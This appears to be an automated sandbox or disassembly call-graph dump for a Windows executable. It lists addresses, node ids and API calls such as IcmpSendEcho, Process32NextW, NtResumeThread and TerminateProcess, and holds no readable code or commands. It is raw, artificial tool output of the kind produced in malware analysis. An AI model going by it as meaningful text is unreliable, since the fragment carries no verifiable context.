91012b 8 API calls 105057->105066 105059 946d28 105058->105059 105062 901fd0 9 API calls 105058->105062 105059->105071 105615 963d0b 81 API calls __wsopen_s 105059->105615 105060 901f22 105609 90fdff 8 API calls 105060->105609 105061 91015b 8 API calls 105061->105066 105067 901c13 105062->105067 105065 8ff1e0 229 API calls 105065->105066 105066->105046 105066->105050 105066->105051 105066->105057 105066->105061 105066->105065 105068 946be0 105066->105068 105066->105071 105067->105059 105070 8fad69 8 API calls 105067->105070 105073 901c77 messages 105067->105073 105613 963d0b 81 API calls __wsopen_s 105068->105613 105070->105073 105071->104980 105072 901fd0 9 API calls 105072->105073 105073->105059 105073->105060 105073->105071 105073->105072 105075 901d2b messages 105073->105075 105345 979d12 105073->105345 105348 95dab3 105073->105348 105351 97a2dc 105073->105351 105357 8f7b4a 105073->105357 105432 97a6d6 105073->105432 105440 96f873 105073->105440 105449 97aa71 105073->105449 105454 970ce2 105073->105454 105479 97eb4d 105073->105479 105506 971582 105073->105506 105513 9663c9 105073->105513 105518 96dc6f 105073->105518 105523 90aaf7 105073->105523 105542 965cea 105073->105542 105574 9830c5 105073->105574 105579 966376 105073->105579 105586 96f674 105073->105586 105074 901dcd 105074->104980 105075->105074 105595 90e1db 105075->105595 105103 8fc26e 105094->105103 106394 8fb080 9 API calls messages 105094->106394 105097 9408ff 105097->104980 105099 940949 105106 940907 105099->105106 105111 940a09 105099->105111 105112 9409ad 105099->105112 105100 8fc3b6 105105 8fc3c5 105100->105105 105127 940ab7 105100->105127 106402 957819 8 API calls __fread_nolock 105100->106402 105102 8fcd46 105113 91015b 8 API calls 105102->105113 105103->105099 105103->105100 105103->105102 105103->105106 105103->105112 105119 8fcd74 __fread_nolock 105103->105119 105121 91012b 8 API calls 105103->105121 105130 940a04 105103->105130 105133 8ff1e0 229 API calls 105103->105133 105136 940a2c 105103->105136 105151 8fc467 __fread_nolock messages 105103->105151 105156 8fcf90 105103->105156 105110 8fc443 105105->105110 105115 91012b 8 API calls 105105->105115 105150 940f1b 105105->105150 105106->105130 106399 963d0b 81 API calls __wsopen_s 105106->106399 105108 940ae8 105108->105105 106405 957819 8 API calls __fread_nolock 105108->106405 105109 940a66 106403 957792 8 API calls __fread_nolock 105109->106403 105125 940ba2 105110->105125 105110->105151 106406 8fb23b 105110->106406 106400 963d0b 81 API calls __wsopen_s 105111->106400 106398 90e5a1 229 API calls 105112->106398 105113->105119 105120 8fc419 105115->105120 105118 940a90 105122 8ff1e0 229 API calls 105118->105122 105124 91015b 8 API calls 105119->105124 105120->105110 106395 8fb1bd 8 API calls 105120->106395 105121->105103 105122->105127 105124->105151 105129 940bb3 105125->105129 105131 8fb23b 8 API calls 105125->105131 105127->105105 105127->105130 106404 975ecc 53 API calls _wcslen 105127->106404 105129->105151 106414 90b96b 8 API calls messages 105129->106414 105131->105129 105133->105103 105135 940d46 105138 8ff1e0 229 API calls 105135->105138 106401 963d0b 81 API calls __wsopen_s 105136->106401 105140 940d70 105138->105140 105140->105130 105143 8facbd 39 API calls 105140->105143 105141 940d9b 106416 963d0b 81 API calls __wsopen_s 105141->106416 105142 8fae35 39 API calls 105142->105151 105143->105141 105145 91012b 8 API calls 105145->105151 105146 8fa35b 8 API calls 105146->105151 105147 940f00 106418 955443 8 API calls messages 105147->106418 105148 8fbe10 39 API calls 105148->105151 105150->105130 106419 963d0b 81 API calls __wsopen_s 105150->106419 105151->105106 105151->105135 105151->105141 105151->105142 105151->105145 105151->105146 105151->105147 105151->105148 105151->105150 105152 8fad69 8 API calls 105151->105152 105153 91015b 8 API calls 105151->105153 105154 8fb23b 8 API calls 105151->105154 105155 8fcaa9 105151->105155 105151->105156 105158 8fc83c messages 105151->105158 106415 95f69d 39 API calls 105151->106415 106417 963978 8 API calls 105151->106417 105152->105151 105153->105151 105154->105151 105155->104980 106397 963d0b 81 API calls __wsopen_s 105156->106397 105157 8fc853 105157->104980 105158->105157 106396 90e1c3 8 API calls messages 105158->106396 105161 90f3ca 105160->105161 105163 90f3d3 105160->105163 105161->104980 105162 90f3f7 IsDialogMessageW 105162->105161 105162->105163 105163->105161 105163->105162 105164 94f895 GetClassLongW 105163->105164 105164->105162 105164->105163 105166 95efc9 105165->105166 105167 95f03a 105165->105167 105169 95efd4 QueryPerformanceCounter 105166->105169 105170 95efcb Sleep 105166->105170 105167->104980 105169->105170 105171 95efe2 QueryPerformanceFrequency 105169->105171 105170->105167 105172 95efec Sleep QueryPerformanceCounter 105171->105172 105173 95f02d 105172->105173 105173->105172 105174 95f031 105173->105174 105174->105167 105175->104980 105176->104980 105177->104980 105200 8ff216 messages 105178->105200 105179 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 105179->105200 105180 9452b2 106487 963d0b 81 API calls __wsopen_s 105180->106487 105181 900535 105188 8fad69 8 API calls 105181->105188 105195 8ff33d messages 105181->105195 105184 944c62 105191 8fad69 8 API calls 105184->105191 105184->105195 105185 9451e1 106486 963d0b 81 API calls __wsopen_s 105185->106486 105188->105195 105189 910592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 105189->105200 105190 8fad69 8 API calls 105190->105200 105191->105195 105193 91012b 8 API calls 105193->105200 105194 8fae03 8 API calls 105194->105200 105195->104980 105197 9103f3 29 API calls pre_c_initialization 105197->105200 105198 94509c 106484 963d0b 81 API calls __wsopen_s 105198->106484 105200->105179 105200->105180 105200->105181 105200->105184 105200->105185 105200->105189 105200->105190 105200->105193 105200->105194 105200->105195 105200->105197 105200->105198 105202 8ff94e messages 105200->105202 106420 900830 105200->106420 106481 900cf0 40 API calls messages 105200->106481 106482 977db9 53 API calls __wsopen_s 105200->106482 106483 977ef8 65 API calls 105200->106483 106485 963d0b 81 API calls __wsopen_s 105202->106485 105203->104980 105204->104980 105205->104986 106503 95e538 105206->106503 105208 95dbc0 FindCloseChangeNotification 105208->104986 105209 95db0e Process32NextW 105209->105208 105211 95db07 105209->105211 105210 8fae03 8 API calls 105210->105211 105211->105208 105211->105209 105211->105210 105212 8fa1d4 8 API calls 105211->105212 105213 8f3e34 8 API calls 105211->105213 105214 8f6aa4 8 API calls 105211->105214 105215 90e224 41 API calls 105211->105215 105212->105211 105213->105211 105214->105211 105215->105211 105217 8ff1e0 229 API calls 105216->105217 105228 8fd82d 105217->105228 105218 94215a 105273 963d0b 81 API calls __wsopen_s 105218->105273 105220 8fd89b messages 105220->105001 105221 8fdc65 105221->105220 105233 91015b 8 API calls 105221->105233 105222 8fd953 105222->105221 105224 8fd95e 105222->105224 105223 8fdb8f 105225 8fdba4 105223->105225 105226 94214b 105223->105226 105249 91012b 105224->105249 105230 91012b 8 API calls 105225->105230 105272 975e8c 8 API calls 105226->105272 105227 8fda48 105259 91015b 105227->105259 105228->105218 105228->105220 105228->105221 105228->105222 105228->105227 105232 91012b 8 API calls 105228->105232 105243 8fd9b9 __fread_nolock messages 105228->105243 105241 8fd9fa 105230->105241 105232->105228 105234 8fd965 __fread_nolock 105233->105234 105235 8fd986 105234->105235 105237 91012b 8 API calls 105234->105237 105235->105243 105258 8fc0f0 229 API calls 105235->105258 105237->105235 105239 94213a 105271 963d0b 81 API calls __wsopen_s 105239->105271 105241->105001 105243->105223 105243->105239 105243->105241 105244 942115 105243->105244 105246 9420f3 105243->105246 105268 8f1c48 229 API calls 105243->105268 105270 963d0b 81 API calls __wsopen_s 105244->105270 105269 963d0b 81 API calls __wsopen_s 105246->105269 105248->105002 105250 910130 ___std_exception_copy 105249->105250 105251 91014a 105250->105251 105254 91014c 105250->105254 105274 9151fd 7 API calls 2 library calls 105250->105274 105251->105234 105253 9109bd 105276 9135f4 RaiseException 105253->105276 105254->105253 105275 9135f4 RaiseException 105254->105275 105257 9109da 105257->105234 105258->105243 105260 91012b ___std_exception_copy 105259->105260 105261 91014a 105260->105261 105264 91014c 105260->105264 105277 9151fd 7 API calls 2 library calls 105260->105277 105261->105243 105263 9109bd 105279 9135f4 RaiseException 105263->105279 105264->105263 105278 9135f4 RaiseException 105264->105278 105267 9109da 105267->105243 105268->105243 105269->105241 105270->105241 105271->105241 105272->105218 105273->105220 105274->105250 105275->105253 105276->105257 105277->105260 105278->105263 105279->105267 105281 8facc8 105280->105281 105282 8facf7 105281->105282 105302 8fae35 105281->105302 105282->105011 105285 8fad7d 105284->105285 105287 8fad8c __fread_nolock 105284->105287 105286 91015b 8 API calls 105285->105286 105285->105287 105286->105287 105287->105011 105288->105011 105289->105007 105291 91015b 8 API calls 105290->105291 105292 8fae18 105291->105292 105293 91012b 8 API calls 105292->105293 105294 8fae26 105293->105294 105295 9103f3 29 API calls __onexit 105294->105295 105295->105016 105296->105011 105297->105011 105298->105011 105299->105011 105300->105011 105301->105011 105319 8fbe10 105302->105319 105304 8fae45 105305 8fae53 105304->105305 105306 93fd3d 105304->105306 105308 91012b 8 API calls 105305->105308 105328 8fa35b 105306->105328 105310 8fae64 105308->105310 105309 93fd48 105311 8fae03 8 API calls 105310->105311 105312 8fae6e 105311->105312 105313 8fae7d 105312->105313 105314 8fad69 8 API calls 105312->105314 105315 91012b 8 API calls 105313->105315 105314->105313 105316 8fae87 105315->105316 105327 8fad0b 39 API calls 105316->105327 105318 8faeab 105318->105282 105320 8fc057 105319->105320 105325 8fbe23 105319->105325 105320->105304 105322 8fbecd 105322->105304 105323 8fae03 8 API calls 105323->105325 105325->105322 105325->105323 105332 910592 5 API calls __Init_thread_wait 105325->105332 105333 9103f3 29 API calls __onexit 105325->105333 105334 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105325->105334 105327->105318 105329 8fa369 105328->105329 105331 8fa36f 105328->105331 105330 8fad69 8 API calls 105329->105330 105329->105331 105330->105331 105331->105309 105332->105325 105333->105325 105334->105325 105336 902011 105335->105336 105337 901fed 105335->105337 105616 910592 5 API calls __Init_thread_wait 105336->105616 105344 901a50 105337->105344 105618 910592 5 API calls __Init_thread_wait 105337->105618 105339 90201b 105339->105337 105617 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105339->105617 105342 908db7 105342->105344 105619 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105342->105619 105344->105039 105620 9786e0 105345->105620 105347 979d22 105347->105073 105768 95e1ac GetFileAttributesW 105348->105768 105355 97a2ef 105351->105355 105352 8f7e30 52 API calls 105353 97a35c 105352->105353 105772 9615d3 105353->105772 105355->105352 105356 97a2fe 105355->105356 105356->105073 105358 8f7e30 52 API calls 105357->105358 105359 8f7b69 105358->105359 105360 8f7e30 52 API calls 105359->105360 105361 8f7b7e 105360->105361 105362 8f7e30 52 API calls 105361->105362 105363 8f7b91 105362->105363 105364 8f7e30 52 API calls 105363->105364 105365 8f7ba7 105364->105365 105816 8f69c4 105365->105816 105368 935798 105848 8f6d01 8 API calls 105368->105848 105370 8f7be2 105370->105368 105397 8f7c08 try_get_first_available_module 105370->105397 105372 9357b7 105849 8f7360 8 API calls 105372->105849 105374 9357c9 105406 9357ee 105374->105406 105850 8f79d0 8 API calls 105374->105850 105376 8f7e30 52 API calls 105380 8f7c97 105376->105380 105378 8f7cbe 105381 8f7ccc 105378->105381 105382 9358a4 105378->105382 105379 8f7cac 105826 8f6d01 8 API calls 105379->105826 105384 8f7e30 52 API calls 105380->105384 105385 93599f 105381->105385 105386 8f7ce1 105381->105386 105387 9358ae 105382->105387 105388 9358ed 105382->105388 105383 8f77ad 8 API calls 105383->105406 105384->105379 105859 8f7360 8 API calls 105385->105859 105827 8f7360 8 API calls 105386->105827 105853 8f7360 8 API calls 105387->105853 105855 8f7360 8 API calls 105388->105855 105394 9358b6 105400 8f7e30 52 API calls 105394->105400 105395 9358f6 105856 8f79d0 8 API calls 105395->105856 105396 8f7ce9 105828 8fabe7 105396->105828 105397->105376 105397->105379 105428 8f7d01 try_get_first_available_module 105397->105428 105398 9359ac 105860 8f79d0 8 API calls 105398->105860 105404 9358c8 105400->105404 105405 935912 105406->105383 105430 8f7de1 105406->105430 105851 8f78a5 8 API calls 105406->105851 105852 8f79d0 8 API calls 105406->105852 105416 935a22 105870 8f78a5 8 API calls 105416->105870 105417 9359f2 105417->105416 105420 935a16 105417->105420 105861 8f9c50 105420->105861 105425 935a30 105871 8f79d0 8 API calls 105425->105871 105427 935a20 105428->105417 105428->105430 105834 8f77ad 105428->105834 105846 8f78a5 8 API calls 105428->105846 105847 8f79d0 8 API calls 105428->105847 105429 935a43 105431 8fabe7 8 API calls 105429->105431 105430->105073 105431->105427 105433 97a6f2 105432->105433 105435 97a732 105432->105435 105433->105073 105434 97a750 105434->105433 105436 8fb81d 39 API calls 105434->105436 105438 97a7b8 105434->105438 105435->105434 105437 8fb81d 39 API calls 105435->105437 105436->105438 105437->105434 105873 96009c 105438->105873 105441 8f7e30 52 API calls 105440->105441 105442 96f8ad 105441->105442 105932 8fa400 105442->105932 105444 96f8bd 105445 8ff1e0 229 API calls 105444->105445 105446 96f8e2 105444->105446 105445->105446 105448 96f8e6 105446->105448 105959 8f5a63 8 API calls 105446->105959 105448->105073 105450 8f7e30 52 API calls 105449->105450 105451 97aa8d 105450->105451 105452 95dac1 46 API calls 105451->105452 105453 97aa9c 105452->105453 105453->105073 105455 970d0b 105454->105455 105456 970d39 WSAStartup 105455->105456 105457 8fb81d 39 API calls 105455->105457 105458 970d7e 105456->105458 105478 970d4d messages 105456->105478 105460 970d26 105457->105460 106024 90c0af 105458->106024 105460->105456 105463 8fb81d 39 API calls 105460->105463 105462 8f7e30 52 API calls 105464 970d93 105462->105464 105465 970d35 105463->105465 106029 90fac6 WideCharToMultiByte 105464->106029 105465->105456 105467 970d9f inet_addr gethostbyname 105468 970dbd IcmpCreateFile 105467->105468 105467->105478 105469 970dfd 105468->105469 105468->105478 105470 91015b 8 API calls 105469->105470 105471 970e16 105470->105471 106037 8f3966 105471->106037 105474 970e55 IcmpSendEcho 105476 970e76 105474->105476 105475 970e2c IcmpSendEcho 105475->105476 105477 970f3c IcmpCloseHandle WSACleanup 105476->105477 105477->105478 105478->105073 105480 8f7e30 52 API calls 105479->105480 105481 97eb68 105480->105481 105482 8f69c4 8 API calls 105481->105482 105483 97eb77 105482->105483 105484 97ebab 105483->105484 105486 8fb81d 39 API calls 105483->105486 106042 8f70c5 105484->106042 105488 97eb88 105486->105488 105488->105484 105490 97eb8d 105488->105490 105489 8fa1d4 8 API calls 105493 97ebc2 105489->105493 105491 8fad69 8 API calls 105490->105491 105492 97eb9d 105490->105492 105491->105492 106067 8f6a09 8 API calls 105492->106067 105496 97ebea 105493->105496 105498 8fad69 8 API calls 105493->105498 105495 97ecab 105495->105073 105497 8fae03 8 API calls 105496->105497 105501 97ec17 105497->105501 105498->105496 105499 97ec4e 105504 97ec6c 105499->105504 106057 8f6aa4 105499->106057 105501->105499 106045 959747 105501->106045 106051 8f58dc 105501->106051 106066 8f728a 8 API calls 105504->106066 105507 8fb81d 39 API calls 105506->105507 105508 971596 105507->105508 105510 8fb81d 39 API calls 105508->105510 105512 9715d3 105508->105512 105509 9715f6 105509->105073 105510->105512 105511 8fa35b 8 API calls 105511->105509 105512->105509 105512->105511 105514 8f7e30 52 API calls 105513->105514 105515 9663dc 105514->105515 105516 95e1ac 3 API calls 105515->105516 105517 9663e6 105516->105517 105517->105073 105519 8fa35b 8 API calls 105518->105519 105520 96dc82 105519->105520 106079 961650 105520->106079 105522 96dc8a 105522->105073 105524 8f7e30 52 API calls 105523->105524 105525 90ab21 105524->105525 106099 90bb11 105525->106099 105527 90ab38 105528 8fb81d 39 API calls 105527->105528 105537 90af54 _wcslen 105527->105537 105528->105537 105530 8f69c4 8 API calls 105530->105537 105531 8f5a63 8 API calls 105531->105537 105533 8f9c50 8 API calls 105533->105537 105534 90ba77 43 API calls 105534->105537 105535 90b0b4 105535->105073 105536 8f7e30 52 API calls 105536->105537 105537->105530 105537->105531 105537->105533 105537->105534 105537->105535 105537->105536 105541 8fb81d 39 API calls 105537->105541 106104 8f3989 105537->106104 106114 8f2f14 105537->106114 106118 914d78 40 API calls 3 library calls 105537->106118 106119 8f6a09 8 API calls 105537->106119 106120 8f7467 105537->106120 105541->105537 105543 965dd2 105542->105543 105544 965d09 105542->105544 105546 8f7e30 52 API calls 105543->105546 105556 965e26 105543->105556 105545 8fb81d 39 API calls 105544->105545 105547 965d14 105545->105547 105549 965e04 105546->105549 105548 8fb81d 39 API calls 105547->105548 105550 965d2a 105548->105550 105551 8f7e30 52 API calls 105549->105551 105550->105543 105553 8fae03 8 API calls 105550->105553 105552 965e16 105551->105552 106169 95d65b 105552->106169 105555 965d3b 105553->105555 105557 8fae03 8 API calls 105555->105557 105556->105073 105558 965d44 105557->105558 105559 8f7e30 52 API calls 105558->105559 105560 965d51 105559->105560 106212 8f3e34 105560->106212 106340 9832ee 105574->106340 105576 9830d3 105577 8fa35b 8 API calls 105576->105577 105578 98311b 105577->105578 105578->105073 105580 8f7e30 52 API calls 105579->105580 105581 96638c 105580->105581 106356 95d98e 105581->106356 105583 966394 105584 966398 GetLastError 105583->105584 105585 9663ad 105583->105585 105584->105585 105585->105073 105587 91015b 8 API calls 105586->105587 105588 96f685 105587->105588 105589 8f3966 8 API calls 105588->105589 105590 96f68f 105589->105590 105591 8f7e30 52 API calls 105590->105591 105592 96f6a6 GetEnvironmentVariableW 105591->105592 106381 961339 8 API calls 105592->106381 105594 96f6c3 messages 105594->105073 105596 90e1e3 105595->105596 105597 90e207 105596->105597 106382 8fb5f0 105596->106382 105597->105075 105599 90e1ee messages 105599->105075 105600->105034 105602 8fa1e3 _wcslen 105601->105602 105603 91015b 8 API calls 105602->105603 105604 8fa20b __fread_nolock 105603->105604 105605 91012b 8 API calls 105604->105605 105606 8fa221 105605->105606 105606->105047 105607->105036 105608->105060 105609->105060 105610->105032 105611->105071 105612->105071 105613->105071 105614->105067 105615->105071 105616->105339 105617->105337 105618->105342 105619->105344 105658 8f7e30 105620->105658 105624 978a08 105625 978bd6 105624->105625 105630 978a16 105624->105630 105720 97966b 59 API calls 105625->105720 105628 978be5 105629 978bf1 105628->105629 105628->105630 105645 97875c messages 105629->105645 105694 97860d 105630->105694 105631 8f7e30 52 API calls 105646 9787d0 105631->105646 105636 978a4f 105708 90ffc0 105636->105708 105639 978a6f 105714 963d0b 81 API calls __wsopen_s 105639->105714 105640 978a89 105715 8f6d01 8 API calls 105640->105715 105643 978a7a GetCurrentProcess TerminateProcess 105643->105640 105644 978a98 105716 8f7360 8 API calls 105644->105716 105645->105347 105646->105624 105646->105631 105646->105645 105712 954868 8 API calls __fread_nolock 105646->105712 105713 978ca4 41 API calls _strftime 105646->105713 105659 8f7e45 105658->105659 105660 8f7e42 105658->105660 105661 8f7e4d 105659->105661 105662 8f7e7b 105659->105662 105660->105645 105681 97945a 105660->105681 105722 915516 26 API calls 105661->105722 105664 935b50 105662->105664 105667 8f7e8d 105662->105667 105672 935a69 105662->105672 105725 9154d3 26 API calls 105664->105725 105665 8f7e5d 105671 91012b 8 API calls 105665->105671 105723 90fe35 51 API calls 105667->105723 105668 935b68 105668->105668 105673 8f7e67 105671->105673 105675 91015b 8 API calls 105672->105675 105680 935ae2 105672->105680 105674 8fa1d4 8 API calls 105673->105674 105674->105660 105676 935ab2 105675->105676 105677 91012b 8 API calls 105676->105677 105678 935ad9 105677->105678 105679 8fa1d4 8 API calls 105678->105679 105679->105680 105724 90fe35 51 API calls 105680->105724 105726 8fb159 105681->105726 105683 979475 CharLowerBuffW 105732 95954d 105683->105732 105687 8fae03 8 API calls 105688 9794b1 105687->105688 105739 8f7642 105688->105739 105690 9794c5 105752 8f8635 105690->105752 105692 9795e5 _wcslen 105692->105646 105693 9794cf _wcslen 105693->105692 105756 978ca4 41 API calls _strftime 105693->105756 105695 978628 105694->105695 105699 978673 105694->105699 105696 91015b 8 API calls 105695->105696 105697 97864a 105696->105697 105698 91012b 8 API calls 105697->105698 105697->105699 105698->105697 105700 97981d 105699->105700 105701 979a32 messages 105700->105701 105706 979841 _strcat _wcslen ___std_exception_copy 105700->105706 105701->105636 105702 8fb81d 39 API calls 105702->105706 105703 8fb4cf 39 API calls 105703->105706 105704 8fb8eb 39 API calls 105704->105706 105705 8f7e30 52 API calls 105705->105706 105706->105701 105706->105702 105706->105703 105706->105704 105706->105705 105767 95f5ef 10 API calls _wcslen 105706->105767 105710 90ffd5 105708->105710 105709 91006d NtResumeThread 105711 91003b 105709->105711 105710->105709 105710->105711 105711->105639 105711->105640 105712->105646 105713->105646 105714->105643 105715->105644 105720->105628 105722->105665 105723->105665 105724->105664 105725->105668 105727 8fb16c 105726->105727 105728 8fb169 __fread_nolock 105726->105728 105729 91012b 8 API calls 105727->105729 105728->105683 105730 8fb177 105729->105730 105731 91015b 8 API calls 105730->105731 105731->105728 105733 95956d _wcslen 105732->105733 105734 95965c 105733->105734 105736 959661 105733->105736 105738 9595a2 105733->105738 105734->105687 105734->105693 105736->105734 105737 90e224 41 API calls 105736->105737 105737->105736 105738->105734 105757 90e224 105738->105757 105740 8f76ae 105739->105740 105741 8f7651 105739->105741 105742 8f8635 8 API calls 105740->105742 105741->105740 105743 8f765c 105741->105743 105744 8f767f __fread_nolock 105742->105744 105745 9356f7 105743->105745 105746 8f7677 105743->105746 105744->105690 105747 91012b 8 API calls 105745->105747 105763 8f7851 105746->105763 105749 935701 105747->105749 105750 91015b 8 API calls 105749->105750 105751 935734 105750->105751 105753 8f8643 105752->105753 105755 8f864c __fread_nolock 105752->105755 105754 8fb159 8 API calls 105753->105754 105753->105755 105754->105755 105755->105693 105756->105692 105758 90e233 CompareStringW 105757->105758 105762 94e37f 105757->105762 105760 90e258 105758->105760 105760->105738 105761 91e20b 40 API calls 105761->105762 105762->105760 105762->105761 105764 8f7869 105763->105764 105766 8f7863 105763->105766 105765 91015b 8 API calls 105764->105765 105765->105766 105766->105744 105767->105706 105769 95daba 105768->105769 105770 95e1c7 FindFirstFileW 105768->105770 105769->105073 105770->105769 105771 95e1dc FindClose 105770->105771 105771->105769 105773 9615e0 105772->105773 105774 91012b 8 API calls 105773->105774 105775 9615e7 105774->105775 105778 95f9df 105775->105778 105777 961621 105777->105356 105779 8fb159 8 API calls 105778->105779 105780 95f9f2 CharLowerBuffW 105779->105780 105783 95fa05 105780->105783 105781 95fa0f ___scrt_fastfail 105781->105777 105782 95fa43 105785 95fa55 105782->105785 105811 8f53e8 105782->105811 105783->105781 105783->105782 105784 8f53e8 8 API calls 105783->105784 105784->105783 105786 91015b 8 API calls 105785->105786 105788 95fa83 105786->105788 105789 95faa5 105788->105789 105814 95f917 8 API calls 105788->105814 105796 95fb36 105789->105796 105792 95fae2 105792->105781 105793 91012b 8 API calls 105792->105793 105794 95fafc 105793->105794 105797 8fae03 8 API calls 105796->105797 105798 95fb68 105797->105798 105799 8fae03 8 API calls 105798->105799 105800 95fb71 105799->105800 105801 8fae03 8 API calls 105800->105801 105808 95fb7a 105801->105808 105802 8f7467 8 API calls 105802->105808 105803 8f9c50 8 API calls 105803->105808 105804 9166d8 GetStringTypeW 105804->105808 105806 916621 39 API calls 105806->105808 105807 95fb36 40 API calls 105807->105808 105808->105802 105808->105803 105808->105804 105808->105806 105808->105807 105809 95fe3e 105808->105809 105810 8fad69 8 API calls 105808->105810 105815 916702 GetStringTypeW _strftime 105808->105815 105809->105792 105810->105808 105812 8fb159 8 API calls 105811->105812 105813 8f53f3 105812->105813 105813->105785 105814->105788 105815->105808 105817 91015b 8 API calls 105816->105817 105818 8f69e9 105817->105818 105819 91012b 8 API calls 105818->105819 105820 8f69f7 105819->105820 105820->105368 105821 8fb81d 105820->105821 105822 8fb82e 105821->105822 105823 8fb835 105821->105823 105822->105823 105872 916621 39 API calls 105822->105872 105823->105370 105825 8fb878 105825->105370 105826->105378 105827->105396 105829 8fac01 105828->105829 105833 8fabf4 105828->105833 105830 91012b 8 API calls 105829->105830 105833->105428 105835 8f7841 105834->105835 105836 8f77c0 105834->105836 105837 8f8635 8 API calls 105835->105837 105836->105835 105839 8f77cc 105836->105839 105838 8f77de __fread_nolock 105837->105838 105838->105428 105840 8f77d6 105839->105840 105841 8f7804 105839->105841 105843 8f7851 8 API calls 105840->105843 105842 91012b 8 API calls 105841->105842 105844 8f780e 105842->105844 105843->105838 105845 91015b 8 API calls 105844->105845 105845->105838 105846->105428 105847->105428 105848->105372 105849->105374 105850->105406 105851->105406 105852->105406 105853->105394 105855->105395 105856->105405 105859->105398 105860->105428 105862 93f5a1 105861->105862 105863 8f9c68 105861->105863 105864 91012b 8 API calls 105862->105864 105863->105862 105866 8f9c72 105863->105866 105865 93f5b2 105864->105865 105868 91015b 8 API calls 105865->105868 105867 91015b 8 API calls 105866->105867 105869 8f9c7d __fread_nolock 105866->105869 105867->105869 105868->105869 105869->105427 105870->105425 105871->105429 105872->105825 105905 95ffd4 105873->105905 105876 960135 105879 96019b 105876->105879 105882 960145 105876->105882 105877 96011d 105921 960313 56 API calls __fread_nolock 105877->105921 105880 960231 105879->105880 105881 9601cb 105879->105881 105898 9600c3 __fread_nolock 105879->105898 105885 9602da 105880->105885 105886 96023a 105880->105886 105883 9601d0 105881->105883 105884 9601fb 105881->105884 105887 96017d 105882->105887 105922 96257f 10 API calls 105882->105922 105883->105898 105925 8fb8eb 39 API calls 105883->105925 105884->105898 105926 8fb8eb 39 API calls 105884->105926 105885->105898 105930 8fb4cf 39 API calls 105885->105930 105888 9602b7 105886->105888 105889 96023f 105886->105889 105912 96156e 105887->105912 105888->105898 105929 8fb4cf 39 API calls 105888->105929 105893 960245 105889->105893 105894 96027e 105889->105894 105893->105898 105927 8fb4cf 39 API calls 105893->105927 105894->105898 105928 8fb4cf 39 API calls 105894->105928 105898->105433 105900 960151 105923 96257f 10 API calls 105900->105923 105903 960168 __fread_nolock 105924 96257f 10 API calls 105903->105924 105906 960021 105905->105906 105910 95ffe5 105905->105910 105908 8fb81d 39 API calls 105906->105908 105907 96001f 105907->105876 105907->105877 105907->105898 105908->105907 105909 8f7e30 52 API calls 105909->105910 105910->105907 105910->105909 105931 914d78 40 API calls 3 library calls 105910->105931 105913 961579 105912->105913 105914 91012b 8 API calls 105913->105914 105915 961580 105914->105915 105916 96158c 105915->105916 105917 9615ad 105915->105917 105918 91015b 8 API calls 105916->105918 105919 91015b 8 API calls 105917->105919 105920 961595 ___scrt_fastfail 105918->105920 105919->105920 105920->105898 105921->105898 105922->105900 105923->105903 105924->105887 105925->105898 105926->105898 105927->105898 105928->105898 105929->105898 105930->105898 105931->105910 105933 8f69c4 8 API calls 105932->105933 105957 8fa425 __fread_nolock 105933->105957 105934 8fa64b 105935 8faa39 8 API calls 105934->105935 105938 8fa665 105935->105938 105938->105444 105940 93fb5d 105947 91012b 8 API calls 105940->105947 105941 8fabe7 8 API calls 105941->105957 105942 93fc84 105996 959d96 83 API calls __wsopen_s 105942->105996 105944 8fa99d 105997 959d96 83 API calls __wsopen_s 105944->105997 105946 8f9c50 8 API calls 105946->105957 105949 93fb7e 105947->105949 105948 93fc92 105950 8faa39 8 API calls 105948->105950 105952 91015b 8 API calls 105949->105952 105951 93fca8 105950->105951 105951->105938 105955 93fbb8 __fread_nolock 105952->105955 105953 8fb159 8 API calls 105956 8fa61c CharUpperBuffW 105953->105956 105955->105944 105956->105957 105957->105934 105957->105940 105957->105941 105957->105942 105957->105944 105957->105946 105957->105953 105957->105955 105958 91015b 8 API calls 105957->105958 105960 8f7eaa 105957->105960 105970 8faa39 105957->105970 105978 8f6b3f 105957->105978 105992 8fab97 105957->105992 105958->105957 105959->105448 105968 8f7ed8 _wcslen 105960->105968 105961 8fabe7 8 API calls 105961->105968 105962 8f8049 105999 8f59dc 105962->105999 105964 8f9c50 8 API calls 105964->105968 105965 8f7f8d 105965->105957 105966 8f7f86 105998 91664b 39 API calls 105966->105998 105968->105961 105968->105962 105968->105964 105968->105966 106008 91d2b5 39 API calls 105968->106008 105971 8faac3 105970->105971 105977 8faa49 __fread_nolock 105970->105977 105973 91015b 8 API calls 105971->105973 105972 91012b 8 API calls 105974 8faa50 105972->105974 105973->105977 105975 8faa6e 105974->105975 105976 91012b 8 API calls 105974->105976 105975->105957 105976->105975 105977->105972 105979 8fabe7 8 API calls 105978->105979 105980 8f6b4e 105979->105980 105981 9354a0 105980->105981 105983 8f6bbc 105980->105983 105984 8f6c63 8 API calls 105980->105984 105982 91012b 8 API calls 105981->105982 105985 9354aa 105982->105985 105986 8fb159 8 API calls 105983->105986 105984->105980 105989 91015b 8 API calls 105985->105989 105987 8f6bc3 CharUpperBuffW 105986->105987 105988 8f6bd5 105987->105988 105990 8f6bdc __fread_nolock 105988->105990 105991 8fab97 8 API calls 105988->105991 105989->105990 105990->105957 105991->105990 105995 8faba7 105992->105995 105993 91012b 8 API calls 105994 8fabba 105993->105994 105994->105957 105995->105993 105996->105948 105997->105938 105998->105965 106000 934816 105999->106000 106001 8f59f3 105999->106001 106003 91012b 8 API calls 106000->106003 106009 8f5a04 106001->106009 106005 934820 _wcslen 106003->106005 106004 8f59fe 106004->105965 106006 91015b 8 API calls 106005->106006 106007 934859 __fread_nolock 106006->106007 106008->105968 106010 8f5a14 _wcslen 106009->106010 106011 8f5a27 106010->106011 106012 934878 106010->106012 106019 8f6c63 106011->106019 106014 91012b 8 API calls 106012->106014 106016 934882 106014->106016 106015 8f5a34 __fread_nolock 106015->106004 106017 91015b 8 API calls 106016->106017 106018 9348b2 __fread_nolock 106017->106018 106020 8f6c79 106019->106020 106023 8f6c74 __fread_nolock 106019->106023 106021 935514 106020->106021 106022 91015b 8 API calls 106020->106022 106022->106023 106023->106015 106025 91015b 8 API calls 106024->106025 106026 90c0c2 106025->106026 106027 91012b 8 API calls 106026->106027 106028 90c0ce 106027->106028 